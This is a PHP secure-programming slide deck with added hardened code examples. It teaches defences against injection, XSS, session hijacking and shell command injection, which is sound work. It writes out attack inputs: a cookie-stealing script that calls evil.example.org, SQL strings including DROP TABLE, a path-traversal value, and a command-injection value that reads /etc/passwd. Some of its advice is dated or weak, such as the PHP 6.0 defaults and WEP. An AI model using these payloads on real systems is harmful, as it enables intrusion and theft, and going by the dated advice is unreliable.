
PHP Secure Programming


  1. PHP Attacks and Defense
     K. Bala Vignesh, kbalavignesh@gmail.com
  2. The most secured computer in the WORLD: no need to secure the OS, no need to secure the software, no need to do anything. It's naturally secured.
  3. Even no need to switch it ON.
  4. Web Security? PHP?
  5. Fact 1: PHP is mainly for web programs. Fact 2: Easy to learn.
  6. Fact 3: PHP runs on 20,917,850 domains and 1,224,183 IP addresses. Fact 4: More flexible functions.
  7. A few named threats: Code Injection, SQL Injection, Cross Site Scripting (XSS), Session Hijacking, Session Fixation, Temp Files abuse, Remote Execution, and more and more unnamed threats...
  8. Code Injection
  9. Code Injection: don't directly pass the filenames.

         $filename = $_REQUEST['message'];
         $message = file_get_contents($filename);
         print $message;

     This is OK: http://example.com/myscript.php?message=hello.txt
     But what if I do this?: http://example.com/myscript.php?message=passwords.txt
  10. Code Injection: this is especially important for include, require and require_once.

         $module = $_REQUEST['module'];
         include("lib/$module");

     This is OK: http://example.com/cms?module=login.php
     But what if I do this?: http://example.com/cms?module=../passwords.ini
  11. Code Injection Defense: make sure the value is one you expected; if not, ERROR!

         $requestedModule = $_REQUEST['module'];
         switch ($requestedModule) {
             case "login":  $module = "login";  break;
             case "logout": $module = "logout"; break;
             default:       $module = "error";
         }
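An added example, not from the slides, that generalizes the switch above: an allowlist map for include() and a realpath() check that confines the message file read to one directory. The MODULES map, the lib/ and messages/ paths and the function names are assumptions.

```php
<?php
// Added example (not from the slides). Paths and module names are assumed.

// Only names in this map can ever reach include(); the user's string is a key,
// never a file name.
const MODULES = [
    'login'  => 'lib/login.php',
    'logout' => 'lib/logout.php',
    'error'  => 'lib/error.php',
];

function modulePath(string $requested): string
{
    // Unknown names fall back to the error module.
    $name = array_key_exists($requested, MODULES) ? $requested : 'error';
    return __DIR__ . '/' . MODULES[$name];
}

// Returns the file's contents only if it resolves inside $baseDir, which
// rejects "../passwords.ini" style traversal and symlinks that point outside.
function readMessage(string $name, string $baseDir): ?string
{
    if ($name === '' || strpos($name, "\0") !== false) {
        return null;                       // empty or NUL-byte names are never valid
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name);
    if ($base === false || $path === false) {
        return null;                       // missing directory or file
    }
    // Compare with the trailing separator so /var/msgs2 does not match /var/msgs.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;                       // resolved outside the base directory
    }
    return file_get_contents($path);
}

// Usage: $_REQUEST values may be arrays, so only accept strings.
$module = is_string($_REQUEST['module'] ?? null) ? $_REQUEST['module'] : '';
include modulePath($module);

$name    = is_string($_REQUEST['message'] ?? null) ? $_REQUEST['message'] : '';
$message = readMessage($name, __DIR__ . '/messages');
echo $message === null ? 'Error: no such message' : htmlentities($message, ENT_QUOTES, 'UTF-8');
```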
  12. SQL Injection
  13. SQL Injection: a form for user search...

         $username = $_POST['username'];
         $query = "SELECT * FROM users WHERE name = '" . $username . "';";

     If I give $username = a' or 't'='t, the query will be:

         SELECT * FROM users WHERE name = 'a' or 't'='t';
  14. SQL Injection: if I give $username = a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '%, the query will be:

         SELECT * FROM users WHERE name = 'a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '%';
  15. SQL Injection Defense:
     - Use single quotation, e.g. "select * from users where user = '" . $username . "'"
     - Check the types of user submitted values: is_bool(), is_float(), is_numeric(), is_string(), is_int(), intval(), settype(), strlen(); e.g. strpos($query, ';')
     - Escape every questionable character in your query (' " , ; ( )) and the keywords FROM, LIKE and WHERE: mysql_real_escape_string
  16. SQL Injection Defense: magic_quotes_gpc (default: on; deprecated in PHP 6.0). If off, use addslashes. If on and you don't need it, stripslashes:

         if (get_magic_quotes_gpc()) {
             $_GET    = array_map('stripslashes', $_GET);
             $_POST   = array_map('stripslashes', $_POST);
             $_COOKIE = array_map('stripslashes', $_COOKIE);
         }
  17. SQL Injection Defense: MySQL Improved Extension (mysqli) prepared statements.

         $query = mysqli_prepare($connection, "select * from user where user = ?");
         mysqli_stmt_bind_param($query, "s", $username);
         mysqli_stmt_execute($query);

     Type codes: s = string, i = integer, d = double, b = binary (blob). Alternatives: PEAR DB, DataObject.
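An added example, not from the slides: the search-by-name query from slide 13 rewritten as a parameterised mysqli statement, plus an integer lookup that combines the type check from slide 15 with a typed bind. Connection details are placeholders, the users table is assumed to have id and name columns, and get_result() assumes the mysqlnd driver.

```php
<?php
// Added example (not from the slides). Credentials and table layout are assumed.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);  // throw instead of silently failing

function findUsersByName(mysqli $db, string $username): array
{
    // The ? is a real parameter: the value is sent separately from the SQL text,
    // so a' or 't'='t is looked up as a literal name and simply matches nothing.
    $stmt = $db->prepare("SELECT id, name FROM users WHERE name = ?");
    $stmt->bind_param('s', $username);            // s: bind as a string
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);  // needs mysqlnd
    $stmt->close();
    return $rows;
}

function findUserById(mysqli $db, string $rawId): ?array
{
    // Type-check first (slide 15): only decimal digits are accepted, then bind as int.
    if ($rawId === '' || !ctype_digit($rawId)) {
        return null;
    }
    $id = (int) $rawId;
    $stmt = $db->prepare("SELECT id, name FROM users WHERE id = ?");
    $stmt->bind_param('i', $id);                  // i: bind as an integer
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage with placeholder credentials.
$db = new mysqli('localhost', 'DB_USER', 'DB_PASSWORD', 'DB_NAME');
$db->set_charset('utf8mb4');   // keep the connection charset explicit

$username = is_string($_POST['username'] ?? null) ? $_POST['username'] : '';
foreach (findUsersByName($db, $username) as $row) {
    // Output encoding belongs here, not in the query (see the XSS slides).
    echo htmlentities($row['name'], ENT_QUOTES, 'UTF-8'), "<br>\n";
}
```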
  18. XSS - Cross Site Scripting
  19. XSS:
     1) Inserting scripts:

         <script>
         document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie
         </script>

     2) Login
     3) Set cookies
     4) Executes the scripts
     5) Steals the cookies
  20. XSS: remote control of the client browser; reveal the value of a cookie; change links on the page; redirect to another URI; render a bogus form; or any undesirable action...
  21. XSS Defense: encode HTML entities in all non-HTML output with htmlentities().

         $str = "A 'quote' is <b>bold</b>";
         echo htmlentities($str);

     The output will be: A 'quote' is &lt;b&gt;bold&lt;/b&gt;

     Check the image upload URI (avatar, icon) with parse_url, e.g.:

         <img src="http://shopping.example.com/addCart.php?item=123"/>

     Show the domain name for user submitted links, e.g.:
     Not safe: Hey click this to see my photo <a href="http://badguys.net">Bala</a>
     Safe: Hey click this to see my photo [badguys.net] Bala
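An added example, not from the slides: an output encoder that also covers single quotes (ENT_QUOTES, which the htmlentities() default above does not), and a parse_url() based renderer for user submitted links that shows the real host next to the label, as slide 21 recommends. The function names and the rel attribute are my choices.

```php
<?php
// Added example (not from the slides). Function names are assumed.

function e(string $s): string
{
    // ENT_QUOTES also encodes ' so the value is safe inside single-quoted
    // attributes as well as in element text; the charset must be stated.
    return htmlentities($s, ENT_QUOTES, 'UTF-8');
}

// Returns HTML for a user-supplied link, or null if the URL is not acceptable.
function renderUserLink(string $url, string $label): ?string
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;     // malformed, relative, or scheme-only like javascript:...
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;     // only web URLs are linked
    }
    $host = strtolower($parts['host']);
    // The visible text always carries the real host, so a friendly label
    // cannot hide where the link goes.
    return sprintf(
        '<a href="%s" rel="nofollow noopener">[%s] %s</a>',
        e($url), e($host), e($label)
    );
}

// Usage with constructed input (the slide's "badguys.net" example and an
// injected script URL).
$samples = [
    ['http://badguys.net/photo', 'Bala'],
    ['javascript:alert(document.cookie)', 'click me'],
];
foreach ($samples as [$url, $label]) {
    $html = renderUserLink($url, $label);
    echo $html === null ? 'link rejected' : $html, "\n";
}
```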
  22. Session Hijacking
  23. What is a Session ID?
  24. Session Hijacking (diagram: Victim, Attacker, Web Server; the victim's Session ID = AD238723FD32)
  25. Session Hijacking (diagram: Victim, Attacker, Web Server; the attacker now also presents Session ID = AD238723FD32)
  26. Session Hijacking: network eavesdropping (promiscuous mode). If intranet? Use a switch rather than a hub. If Wi-Fi? WEP (Wired Equivalent Privacy). If Internet? SSL.
  27. Session Hijacking: unwitting exposure when sending links.
     See this item: http://store.com/items.php?item=0987 (it's OK)
     If I send it like this: http://store.com/items.php?item=0987&phpsessid=34223
     How to avoid? session.use_trans_sid (turned off by default); session.use_only_cookies (defaults to 1 (enabled) since PHP 6.0).
  28. Session Fixation (diagram: Victim, Attacker, Web Server):
     1) Attacker: "See this link http://unsafesite?SID=3423"
     2) If the victim clicks http://unsafesite?SID=3423, the server sets SessionID = 3423 (session_id($_GET['SID']))
     3) Shows the login page
     4) Now the attacker has full access with http://unsafesite?SID=3423
  29. Session Hijacking Defense:
     - Use SSL.
     - Use cookies instead of $_GET variables:

         ini_set('session.use_only_cookies', TRUE);
         ini_set('session.use_trans_sid', FALSE);

     - Use session timeouts:

         ini_set('session.cookie_lifetime', 1200);
         ini_set('session.gc_maxlifetime', 1200);   // value assumed to match cookie_lifetime; the slide gives none

     - Regenerate IDs for users with changed status: session_regenerate_id
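An added example, not from the slides: the slide 29 settings applied before session_start(), an idle timeout, and session_regenerate_id() at login so that a fixed ID planted as in slide 28 is discarded before the session becomes authenticated. The function names and the 1200-second window are assumptions; use_strict_mode, cookie_httponly and cookie_secure are standard PHP session settings not mentioned on the slides.

```php
<?php
// Added example (not from the slides). Function names and the window are assumed.
const SESSION_IDLE_SECONDS = 1200;

function startHardenedSession(): void
{
    // All ini_set() calls must come before session_start().
    ini_set('session.use_only_cookies', '1');   // never read the ID from the URL
    ini_set('session.use_trans_sid', '0');      // never append the ID to links
    ini_set('session.use_strict_mode', '1');    // reject IDs the server did not issue
    ini_set('session.cookie_httponly', '1');    // hide the cookie from document.cookie
    ini_set('session.cookie_secure', '1');      // only send it over SSL/TLS
    ini_set('session.cookie_lifetime', '0');    // browser-session cookie; timeout enforced below
    ini_set('session.gc_maxlifetime', (string) SESSION_IDLE_SECONDS);
    session_start();

    // Idle timeout: a session unused for the window is emptied and re-keyed.
    $last = $_SESSION['last_activity'] ?? time();
    if (time() - $last > SESSION_IDLE_SECONDS) {
        $_SESSION = [];
        session_regenerate_id(true);            // true: delete the old server-side record
    }
    $_SESSION['last_activity'] = time();
}

// Call only after the credentials have been verified. Whatever ID the client
// arrived with (including one chosen by an attacker) is replaced here, so the
// authenticated session is never reachable under the old ID.
function loginUser(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id']       = $userId;
    $_SESSION['last_activity'] = time();
}

function logoutUser(): void
{
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();       // expire the cookie on the client too
        setcookie(session_name(), '', time() - 42000,
            $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    }
    session_destroy();
}
```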
  30. Remote Execution
  31. Remote Execution: injection of shell commands.

         <?php
         $filename = $_GET['filename'];
         $command = "/usr/bin/wc $filename";
         $words = shell_exec($command);
         print "$filename contains $words words.";
         ?>

     This is OK: wordcount.php?filename=textfile.txt
     But what if I give this: wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd
     (filename = /dev/null | cat /etc/passwd), so the command becomes: /usr/bin/wc /dev/null | cat /etc/passwd
  32. Remote Execution Defense:
     - Allow only trusted, human users to import code.
     - Store uploads outside of the web document root.
     - Limit allowable filename extensions for upload.
     - Use the disable_functions directive, e.g. disable_functions = "eval,phpinfo"
     - Do not include PHP scripts from remote servers, e.g. <?php include('http://example.net/code/common.php'); ?>
     - Properly escape all shell commands: escapeshellarg(), escapeshellcmd()
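An added example, not from the slides: the word-count script from slide 31 rewritten so that the request can only name a file inside a fixed upload directory with an allowed extension, and the path reaches the shell only through escapeshellarg(). UPLOAD_DIR, the extension list and the function name are assumptions.

```php
<?php
// Added example (not from the slides). Directory, extensions and names are assumed.
const UPLOAD_DIR  = '/var/app/uploads';   // outside the web document root
const ALLOWED_EXT = ['txt', 'md'];

function countWords(string $requested): ?int
{
    // basename() drops any directory part, so "../etc/passwd" becomes "passwd",
    // which the extension check then rejects anyway.
    $name = basename($requested);
    $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if ($name === '' || strpos($name, "\0") !== false || !in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    $path = UPLOAD_DIR . '/' . $name;
    if (!is_file($path)) {
        return null;
    }
    // escapeshellarg() wraps the value in single quotes and escapes embedded
    // quotes, so "/dev/null | cat /etc/passwd" would reach wc as one literal
    // file name argument rather than as a pipeline.
    $output = shell_exec('/usr/bin/wc -w ' . escapeshellarg($path));
    if (!is_string($output)) {
        return null;                      // wc could not be run
    }
    // wc prints "<count> <path>"; a leading-numeric string casts to its number.
    return (int) ltrim($output);
}

$filename = is_string($_GET['filename'] ?? null) ? $_GET['filename'] : '';
$words    = countWords($filename);
if ($words === null) {
    echo 'Error: no such file';
} else {
    // Encode the echoed name: the file name is user input on its way to HTML.
    printf('%s contains %d words.', htmlentities($filename, ENT_QUOTES, 'UTF-8'), $words);
}
```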
  33. Future? PHP 6.0 deprecations: Register Globals (big security hole), Safe Mode (false sense of security), Magic Quotes (messed with the data).
     Upcoming changes and features:
     http://www.php.net/~derick/meeting-notes.html
     http://www.phphacks.com/content/view/49/33/
     Rasmus Lerdorf - PHP 6.0 Wish List: http://news.php.net/php.internals/17883
  34. What to do? Proper input validation. Don't do programming + security; do secure programming: htmlentities, mysql_real_escape_string, parse_url, addslashes, escapeshellarg, escapeshellcmd... etc. Use SSL. Use PEAR and PECL.
  35. Images from Flickr.com:
     reference: http://flickr.com/photos/opinicus/246099418/
     remote_boy: http://flickr.com/photo_zoom.gne?id=331355695&size=l
     level_cross: http://flickr.com/photo_zoom.gne?id=67342604&size=o
     injection3: http://flickr.com/photos/fleurdelisa/249435636/
     building game1: http://flickr.com/photo_zoom.gne?id=346575350&size=o
     computer_baby1: http://flickr.com/photo_zoom.gne?id=102207751&size=o
     country_border1: http://flickr.com/photo_zoom.gne?id=48740674&size=l
     computer_baby: http://flickr.com/photo_zoom.gne?id=436594815&size=m
     hijack: http://flickr.com/photo_zoom.gne?id=463129891&size=l
     dog_security: http://flickr.com/photo_zoom.gne?id=2205272682&size=l
     Id card: http://flickr.com/photo_zoom.gne?id=1269802640&size=o
  36. References:
     Pro PHP Security, Chris Snyder and Michael Southwell
     http://wikipedia.org/
     http://www.sitepoint.com/article/php-security-blunders
     http://phpsec.org/
     www.google.com
  39. Copyright (c) 2008. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation. http://www.gnu.org/copyleft/fdl.html
